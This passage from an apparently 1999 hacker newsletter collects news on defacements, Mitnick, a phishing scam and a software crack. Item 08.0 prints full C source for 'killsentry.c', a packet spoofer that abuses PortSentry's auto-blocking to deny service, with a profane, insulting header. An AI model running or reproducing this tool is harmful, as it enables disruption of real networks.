"Zyklon" and his love for a woman named "Crystal," they said. The prosecutors said there was an attempt to replace the White House Web page with one referring to "Zyklon" and "Crystal" in May. The White House was forced to shut down the page for two days, and the computer system was reconfigured. Although Burns took credit for the attack during an Internet chat session, he told the judge he simply had provided advice to others on how to do it, the prosecutors said. Story Copyright © 1999 Reuters Limited. All rights reserved. Wired; http://www.wired.com/news/print_version/email/explode-infobeat/politics/story/21625.html?wnpg=all NATO Cracker Pleads Guilty Reuters 3:00 a.m. 8.Sep.99.PDT A 19-year-old computer hacker with the screen name "Zyklon" pleaded guilty Tuesday to attacks involving Web pages for NATO, Vice President Al Gore, and the United States Information Agency, prosecutors said. Prosecutors from the US Attorney's Office said Eric Burns of Shoreline, Washington, also admitted in federal court in Virginia that he advised others on how to attack the White House Web site in May. They said Burns faced a maximum possible punishment of five years in prison, a US$250,000 fine and having to pay restitution. His sentencing was scheduled for 19 November before US District Judge James Cacheris. Burns acknowledged the computer intrusions had caused damages exceeding $40,000, the prosecutors said. He also admitted that he had hacked and damaged computers in Washington, Virginia, Washington state, and London. Prosecutors said Burns designed a program called "Web bandit" to identify computers on the Internet vulnerable to attack. He found that the computer server at Electric Press in Reston, Virginia, was vulnerable and attacked it four times between August 1998 and January 1999, they said. Electric Press hosted the Web pages for NATO, the vice president, and the USIA. Prosecutors said the attacks affected embassy and consular Web sites, which depend on the USIA for information. One attack resulted in the closing down of the USIA Web site for eight days. Prosecutors said Burns also attacked the Web pages of about 80 businesses whose pages were hosted by Laser.Net in Fairfax, Virginia. There were further attacks on the Web pages of two corporate clients of Issue Dynamics in Virginia and Washington, as well as the University of Washington Web page. Prosecutors said Burns also ranged overseas, hitting an Internet service provider in London. Burns usually replaced the Web pages with his own, which often made references to "Zyklon" and his love for a woman named "Crystal," they said. The prosecutors said there was an attempt to replace the White House Web page with one referring to "Zyklon" and "Crystal" in May. The White House was forced to shut down the page for two days and the computer system was reconfigured. Copyright 1999 Reuters Limited. @HWA 06.0 Mitnick Transferred to Lompoc Federal Prison ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by punkis Kevin Mitnick has finally been transferred to the facility where he will spend the remainder of his sentence. It was hoped that he would be sent to the Nellis Federal Prison Camp, where living and working conditions would be a little better than what he's lived with for the past four and a half years he spent awaiting trial. He would also be closer to his mother and grandmother. Unfortunately he has been sent to Lompoc Federal Correctional Institution. Free Kevin http://www.freekevin.com Bureau of Prisons http://www.bop.com @HWA 07.0 C-Span Web Site Defaced ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Wolf D The cable TV network C-SPAN, which broadcasts House and Senate proceedings and other public affairs programming, had its web page defaced by a group known as the 'United Loan Gunmen'. CNN http://www.cnn.com/TECH/computing/9909/05/cspan.hacked.ap/ CMP TechWeb http://www.techweb.com/wire/story/TWB19990906S0002 Associated Press - Via Yahoo http://dailynews.yahoo.com/h/ap/19990905/tc/c_span_hacked_2.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html CNN; Hackers hit Web site of C-SPAN September 6, 1999 Web posted at: 2:10 a.m. EDT (0610 GMT) WASHINGTON (AP) -- Hackers vandalized the Internet site of the C-SPAN cable network Sunday, replacing its Web page with a bizarre note that included lyrics from a punk rock band. The hackers, calling themselves "United Loan Gunmen," also claimed responsibility for the defacement of the Internet site for ABC just weeks ago. The group is believed to be relatively newly formed, and its only known attacks have been the ones against C-SPAN and ABC. Officials at C-SPAN, the public affairs cable network that broadcasts House and Senate proceedings and other public affairs programming, could not be reached Sunday night. The C-SPAN site has since been repaired. The Web site for C-SPAN was temporarily replaced with a black page carrying the logo for the hacker group. It also included lyrics from a song by the punk band, Dead Kennedys, that purports to be a conversation between a U.S. government official and the leader of a Middle Eastern country. The defacement against C-SPAN was first reported on a Web site, Attrition.Org, which tracks hacking efforts on the Internet. The Attrition site contains a mirror of the hacked version. Copyright 1999 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. CMP; Crackers Deface C-SPAN Website By Guy Middleton, TechWeb Sep 6, 1999 (5:26 AM) URL: http://www.techweb.com/wire/story/TWB19990906S0002 Crackers have defaced the Website of U.S. cable tv channel C-SPAN, according to the Associated Press. The crackers, who dubbed themselves the "United Loan Gunmen" (ULG) posted a transcript of a Dead Kennedys song on the site, which contained a fictional discussion between a U.S. government official and a Middle Eastern politician. The ULG presented the transcript as real and said it was discovered, encrypted, on C-SPAN's network. Associated Press; Sunday September 5 11:38 PM ET Hackers Vandalize C-Span Web Site WASHINGTON (AP) - Hackers vandalized the Internet site of the C-SPAN cable network Sunday, replacing its Web page with a bizarre note that included lyrics from a punk rock band. The hackers, calling themselves ``United Loan Gunmen,'' also claimed responsibility for the defacement of the Internet site for ABC just weeks ago. The group is believed to be relatively newly formed, and its only known attacks have been the ones against C-SPAN and ABC. Officials at C-SPAN, the public affairs cable network that broadcasts House and Senate proceedings and other public affairs programming, could not be reached Sunday night. The Web site for C-SPAN was temporarily replaced with a black page carrying the logo for the hacker group. It also included lyrics from a song by the punk band, Dead Kennedys, that purports to be a conversation between a U.S. government official and the leader of a Middle Eastern country. The defacement against C-SPAN was first reported on a Web site, Attrition.Org, which tracks hacking efforts on the Internet. @HWA 08.0 killsentry.c a Port Sentry killer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by the author via wyze1, this piece of code will crash Port Sentry a common internet firewall program. - Ed /* killsentry.c (c) 1999 Vortexia / Andrew Alston Excuse the crappy coding, this code was written when I was very bored, had nothing better to do, and felt like proving the point that automatic firewalling is a bad idea. The code spoofs FIN packets from sequential internet hosts, starting at 1.0.0.0 and going right through to 255.255.255.255, sending 15 packets from each, one packet each to port 100 to 115. Feel free to modify this code, if you use the code for anything, please give me credit where it is due. I hold no responsibility for anything this code is used for, I give no guarantees that this code works, and I hold no responsibility for anything this code does to any system you run it on. If you screw up with it, its your problem, not mine. The code compiles 100% fine with no warnings on FreeBSD 3.2, I dont know about any other platforms or systems. Greets and shoutouts: Wyze1 - Thanks for the moral support, here is something you may use in Forbidden Knowledge Sniper - My partner in crime, you rock Timewiz - What can I say, thanks for ideas for projects still coming Moe1 - For all the information Ive had from you - Its appreciated Uglykidjoe - For things said and done - I owe you Hotmetal - A general greet Bretton Vine - Dont worry the underground you hate so much still loves you Everyone else in #hack on irc.electrocity.com - You guys rock Curses, fuckoffs, and the like - Logik - Get a clue, skript kiddie life aint the way Gaspode - I dont think I even need this - a major FUCK YOU and I hope you get castrated with a rusty spoon - take your god like attitude and shove it up your ass Sunflower - May you fall pregnant to one of the many ircops you screw Anyone else that I dislike but cant think of right now - FUCK YOU Anyone who dislikes me - FUCK YOU */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include int main(int argc, char *argv[]) { #define TARGETHOST "209.212.100.196" int octet1, octet2, octet3, octet4; int i; int sock; int on = 1; struct sockaddr_in sockstruct; struct ip *iphead; struct tcphdr *tcphead; char ipkill[20]; char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)]; struct in_addr spoof, target; int seq, ack; bzero(&evilpacket, sizeof(evilpacket)); // Very bad way to generate sequence numbers srand(getpid()); seq = rand()%time(NULL); ack = rand()%time(NULL); if(argc < 2) { printf("Usage: %s target_host\n",argv[0]); exit(-1); }; target.s_addr=inet_addr(TARGETHOST); if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } sockstruct.sin_family = AF_INET; iphead = (struct ip *)evilpacket; tcphead = (struct tcphdr *)(evilpacket + sizeof(struct ip)); iphead->ip_hl = 5; iphead->ip_v = 4; iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); iphead->ip_id = htons(getpid()); iphead->ip_ttl = 255; iphead->ip_p = IPPROTO_TCP; iphead->ip_dst = target; iphead->ip_sum = 0; iphead->ip_tos = 0; iphead->ip_off = 0; tcphead->th_sport = htons(80); tcphead->th_seq = htonl(seq); tcphead->th_ack = htonl(ack); tcphead->th_win = htons(512); tcphead->th_flags = TH_FIN; tcphead->th_off = 0x50; for(octet1 = 1; octet1 <= 255; octet1++) for(octet2 = 0; octet2 <= 255; octet2++) for(octet3 = 0; octet3 <= 255; octet3++) for(octet4 = 0; octet4 <= 255; octet4++) { bzero(ipkill, 20); sprintf(ipkill, "%d.%d.%d.%d", octet1, octet2, octet3, octet4); for(i = 100; i <= 115; i++) { tcphead->th_dport = htons(i); sockstruct.sin_port = htons(i); spoof.s_addr = inet_addr(ipkill); iphead->ip_src = spoof; sockstruct.sin_addr = spoof; sendto(sock,&evilpacket,sizeof(evilpacket),0x0,(struct sockaddr *)&sockstruct, sizeof(sockstruct)); } } return(1); }; @HWA 09.0 W. Richard Stevens dead at 48 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com W. Richard Stevens - Dead at 48 contributed by evil wench W. Richard Steven noted technology author and teacher died last Wednesday. Stevens was best known for his UNIX Network Programing series and and TCP/IP Illustrated book. The family has asked that in lieu of flowers, donations be made in Richard's name to Habitat for Humanity, 2950 E. 22nd Street, Tucson, AZ 85713. He is survived by his wife and three children. The cause of death was not reported. Big Deal Classifieds - His Obituary http://www.bigdealclassifieds.com/classified/plsql/classlevel3_step?wClass=0002&wPubdate=Friday&wRowstart=2&wLessOrMore= Habitat for Humanity http://www.habitat.org/ Some books written by Richard Stevens: TCP/IP Illustrated, Volume 1 : The Protocols Unix Network Programming : Networking Apis: Sockets and Xti (Volume 1) UNIX Network Programming: Interprocess Communications (Volume 2) Advanced Programming in the Unix Environment Unix Network Programming @HWA 10.0 New Palm Pilot RedBox for Canada is Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Hack.Canada Cyb0rg/asm has released a new, stand-alone version of RedPalm, a Canadian Red Box for the Palm Pilot. This revision corrects timing issues related to processor clock speed on the newer Pilots, as well as featuring quarter, dime, and nickel tones and a snazzy new interface. (This will not work in the US or most other countries due to differences in the types of tones the various phone systems use.) Hack Canada http://www.hackcanada.com/homegrown @HWA 11.0 Windows2000test Suffers Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond A poison packet attack directed against window2000test.com has been claimed to have been successful by the perpetrators. Microsoft claims the server withstood the attack and manually disabled the attackers. (Why are people wasting their time with this? Go do something useful.) C|Net http://www.news.com/News/Item/Textonly/0,25,41287,00.html?pfv Hackers answer Microsoft's Windows 2000 dare By Stephen Shankland Staff Writer, CNET News.com September 3, 1999, 12:55 p.m. PT URL: http://www.news.com/News/Item/0,4,41287,00.html Hackers have answered Microsoft's dare and disabled part of a Windows 2000 server, but both sides are claiming victory. A group of hackers say they disabled part of the server that Microsoft put on the Web as a test for those who think they can breach the system's security. Two attacks that took down the guest book section of the Windows 2000 Beta Internet Test Site took place yesterday. The group sent "poison packets" to the server. The packets masqueraded as small chunks of information but actually were quite large, said George Davey, a leader of the effort. Microsoft confirmed the attack, saying technicians manually disconnected the attackers. While the server's CPU was working to swallow the larger-than-expected data packets, the guest book page was inaccessible. However, the overall system didn't crash and the attackers didn't seize control, said Keith White, director of marketing for Microsoft's business and enterprise division. CNET News.com verified that the guest book didn't appear during one of the attacks yesterday, returning the error message "There is a problem with the page you are trying to reach and it cannot be displayed... Internal server error." Computer security is an increasingly important field as companies move more services to the Internet, often with publicly accessible Web sites that allow visitors to interact with corporate computers. Microsoft wants to make Windows 2000 "the most secure version of Windows ever, both in terms of feature functionality, and system design," the Web site says. Microsoft's site has "ground rules" that exhort would-be attackers to "find the interesting 'magic bullet' that will bring the machine down" and see if they can find "hidden messages sprinkled around the computer." Both sites declared victory. Davey said his group succeeded in getting past some of the computer's defenses, and Microsoft said it succeeded in keeping the machine running and finding new vulnerabilities to address. "This is exactly what we want customers to do with this site," White said. Shortly after the test site went up, the same server was taken down by a lightning storm, but Microsoft also acknowledged at the time that the guest book program had been compromised. Since the site was switched on a month ago, Microsoft has found and fixed four bugs in how the server handles Internet information, White said. An attacker crashed the machine August 17, Microsoft said. Tests only moderately useful Putting a server up for would-be attackers to pound on allows companies to find new security holes, but "a lot of these challenges are more to help the perception that the machine is secure," said Christopher Klaus, chief technology officer of Internet Security Systems. The most serious computer crackers won't participate in such challenges because they don't want to show their hand, Klaus said. "Some people who know how to break in may not want to disclose all their secrets," Klaus said. "If a robber has a master key to break into every building in the world, he's not going to go to the FBI and demonstrate." Windows NT and 2000, as well as Unix and other operating systems, aren't particularly secure unless set up properly, Klaus said. "Most systems out there by default are wide open in terms of security issues," he said, but "can be made pretty secure if configured properly and locked down." More dangerous today are the software applications that reside on top of the operating system. E-commerce has raised a host of new problems because it involves many applications, Klaus said. "Most hackers simply go around it by going through the application layer. As we're seeing e-commerce take off, the hacker's target isn't a small bull's-eye." Attacking the Web server The attacks on the Microsoft server yesterday came through the Active Server Pages (ASP) component of Microsoft's Internet Information Services (IIS) Web server software, Davey said. In testing the attack on his own Windows 2000 servers, he said restarting the server didn't fix the problem; instead, the IIS software had to be reinstalled. Also on the test server, the attack caused the computer's CPU usage to jump to 100 percent. On the Microsoft site, the computer returned to normal once the access was shut down. "Most people don't have the expertise to selectively shut off [specific Internet addresses] like that," Davey said today. "Had they not shut us off, it would have killed their machine." Davey thought it notable that the Microsoft server initially made no mention of the ASP problems. "Why don't you guys mention any of the ASP downtime that we have documented?" he asked in an email to Microsoft. Notification of the attack appeared on the Web site at 10 a.m. today, after CNET News.com called Microsoft about the attack. The machine is running a beta, or test version, of Windows 2000, on a Pentium III chip with 256 MB of memory. The machine has been configured to make access difficult, Davey and Microsoft said. However, as the test continues, the company likely will open up more access channels known as "ports" to test it more heavily. Davey said the challenge of breaking into the system is fun. "Normally, you can't hack, because it's illegal." He praised Windows 2000 as "by far the best thing ever released by Microsoft." But there's still room for improvement. "All these open holes that get shut up will lead to a more secure server," Davey said. @HWA 12.0 Flex-LM Security Breached ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Arik A security hole has been found in Globetrotter Software Inc.'s Flex-LM, a software package used to prevent pirating of electronic design automation (EDA) tools. The breach allows end users to generate keys to bypass the software's copy protection schemes. Some EDA tools retail for upwards of $44,000 per user. Electronic News http://www.electronicnews.com/enews/news/1229-246NewsDetail.asp Hackers compromise software used to protect EDA tools Sep 03, 1999 --- A group of hackers have compromised Globetrotter Software Inc.'s Flex-LM, a software package used by electronic design automation (EDA) tools providers to protect software tools licensed to end-users. EDA industry veteran John Cooley, who was informed of the hack by a colleague, reported the incident this afternoon in ESNUG, his EDA industry newsletter. Only limited details related to the nature of the hack were posted due to its pervasive nature. Virtually all of the EDA vendors license their software using Globetrotter's Flex-LM. The software breach has been posted to an undisclosed Web site that offers free downloads. Another Web site provides tutorials for using the cracked code. With some tools costing $44,000 plus per seat, the "free" key carries a heavy toll. The 6 Meg download allows its users to generate keys that open any Windows-NT based EDA software package to end-users. Essentially, the software renders any existing or protected evaluation copy into a "free" copy by allowing the user to key into the software indefinitely. The networking of NT and UNIX systems probably means this crack could enable the "free" use of UNIX based EDA tools, Cooley said. Cooley did not disclose the site, offering instead to inform authentic EDA company representatives of its whereabouts. Since posting the news this afternoon, the EDA veteran said he has received more that 48 emails from EDA vendors either confirming the hack or requesting more information about the break in Flex-LM. Globetrotter representatives could not be reached for comment by press time. @HWA 13.0 Customers of Numerous ISPs Victims of Fraud ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Dark VVulf A new and interesting form of fraud has appeared around the net. It works like this, a new but similar web site is set up, then the ISPs user base is spamed telling them that their accounts are over due. The email directs the users to the fake web site and asks them to reenter their credit card information. The users then find large charges on their credit card bills. At least three ISPs have been hit with this scam. Wired http://www.wired.com/news/news/technology/story/21572.html New Web Scam Attacks ISPs by Chris Oakes 3:00 a.m. 3.Sep.99.PDT "According to our records, your payment for your Internet access account is late. Perhaps you overlooked it? ...It is very important that you contact us as soon as possible. To update your account information, please go to http://www.valuehelp.net." Oh, and once you get there, we'll rob you blind. Customers of California ISP Value Net received such a message this week, signed by "Sheila Baker, Administrative Assistant." Problem was, it was a scam. ISP abuse experts and the Secret Service say it looks like a new and sophisticated brand of Web scam that is bound to get worse. "It's particularly scary because of the nature of it. It all looks real, and it's easy to perpetrate," said Patrick Greenwell, an Internet consultant who's seen all types of electronic spams and scams come and go. Value Net president Tom Fawcett said at least one of the customers who visited the site entered a credit card number. After Value Net alerted him to the fraud, the customer discovered a substantial unauthorized charge on his account. "When you go to that Web site, a dialog first comes up and says you are entering a secure Web site at Value Net. You're not -- but it says you are," said Fawcett. "They went to a lot of work to make it appear legitimate." The spoof site uses a closely related domain name -- in this case, valuehelp.net, a convincing spin on value.net. Once there, users encountered a form telling them to re-enter their email, name, address, credit card information, and more. Fawcett wasn't sure how many Value Net customers had responded to the email. But he said the ISP received 30 responses to its scam alert notice warning customers not to respond to the phony instructions. The fraudulent site was still operational Thursday morning, but the New Jersey-based service provider hosting the domain shut the site down by the end of the day. Value Net is not the first ISP to encounter such a scam. Peter Veeck, a network administration consultant for Sherman, Texas, ISP Internet Texoma reported that his customers were targeted by a similar fraudulent email in July. One other ISP also confirmed it had been targeted by the same type of fraud, but declined to go on record.Internet Texoma customers were instructed to send their credit card numbers to an address at a free Web-based email service. "There were only about four [customers] that responded," Veeck said. "We caught it pretty quickly." The practice has early roots in scams targeting America Online members several years ago. Though sometimes successful, these scams often had telltale flaws, however, such as obviously fishy return email and Web addresses and crude site mock-ups. The sophistication of the scam perpetrated on Value Net customers represents an alarming refinement of the technique to Internet abuse experts.It also appears to be targeting more mom-and-pop ISPs, rather than just AOL. Value Net's Fawcett stressed that his customers were also alerted -- and protected -- within half an hour of the fraudulent email transmission Wednesday. Value Net customers attempting to visit the URL were redirected to a page containing a warning about the scam. When Fawcett contacted 9 Net Avenue, the fraudulent site's host ISP, the service told him they would not shut the offending down without a court order. So Fawcett turned to the FBI. Since the matter involved credit card fraud, the FBI directed him to the Secret Service, which took prompt action. "We looked at Mr. Fawcett's Web site and compared it to the one that this illegitimate company had set up ... and we were able to match the link to a person down in San Diego who's operating this illegal Web site," said Andrew Dengler, special agent for the San Francisco field office of the Secret Service. Dengler said the San Diego branch of the Secret Service has launched an investigation into the registered domain holder. The Value Net scam was the first for his field office, Dengler said. But he expects more. So do Veeck and Fawcett. "I'm positive that in the next couple of months we're going to see more of this kind of activity," Dengler said. "And I'm optimistic we're going to see more laws passed to help us deal with it." Meanwhile, Fawcett wasn't happy that it took Secret Service involvement to get 9 Net Avenue to act to solve the problem before it wreaked havoc on his customers' credit card accounts. "Most ISPs cooperate and get people to take it down or modify the site," Fawcett said. "But these guys at 9 Net Avenue, they just stiff-armed us." Patrick McGilloway, director of client services for 9 Net Avenue, said the ISP was just following due process to ensure the complaint was legitimate. "Of course, Tom and Value Net wanted to make sure it was shut off the moment he complained, and we had to make sure who we were dealing with." The Secret Service's Dengler agreed that 9 Net Avenue wasn't necessarily wrong to say it needed a court order. "They were just covering themselves legally.... It's something that's very new right now for the legal and prosecutorial community." Veeck, of Internet Texoma, doesn't necessarily agree that more laws are the solution. "If we as denizens of the Internet have to resort to law enforcement , then we give law enforcement control over the Internet. Is that something we want to do? ...Law enforcement should be involved. But the ISPs and everybody needs to work together when they can." @HWA 14.0 Air Force Asks to Preserve 'Panther Den' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond The Air Force has asked House and Senate appropriators to restore almost $500,000 recently cut from the FY 2000 budget. The monies were earmarked for a highly classified program to protect military computer networks from electronic attacks. The program is known as the 'Panther Den'. Further details on 'Panther Den' are unavailable due to its classified nature. JYA.com - originally from 'Inside the Air Force' http://jya.com/af-bio-bt.htm Inside the Air Force, September 3, 1999 Money to be used for information security AIR FORCE ASKS APPROPRIATORS TO PRESERVE FY-00 'PANTHER DEN' SPENDING Richard Lardner The Air Force has called on House and Senate appropriators to restore nearly $500,000 to a highly classified program the service maintains is a key part of its overarching effort to protect military computer networks from electronic attacks. While the amount of money at issue is modest when compared to other programs, an Air Force "budget/program fact paper" shipped to Capitol Hill and obtained by Inside the Air Force claims serious problems will result if the funding is left out of the fiscal year 2000 defense spending bill. "Eliminating this funding line would entirely halt the planned development of sophisticated techniques and technologies for defending systems against sophisticated information warfare and computer network attacks that are beyond commercially available protection systems," the appeal reads. In its FY-00 spending request, the Air Force sought $491,000 in research and development spending for the special access program, known as Panther Den. While Senate provided the requested amount in its FY-00 defense appropriations package, House appropriators did not, citing a desire to eliminate or consolidate budget line items with less than $1 million in funding. But the appeal paper charges the House appropriations position is shortsighted. "The House position, which implies the $0.5 million is used for 'legacy programs that have long since transitioned from development to production to fielding,' should not apply to this program," the paper reads. "This innovative project line is in its infancy in the emerging computer network defense field. . . . This program funds research and development in the Panther Den [SAP] which develops sensitive information operations technologies for the purpose of achieving information superiority," the document adds. According to the fact paper, the Air Force planned to double the annual funding level for Panther Den to $1 million per year beginning in FY-01. The service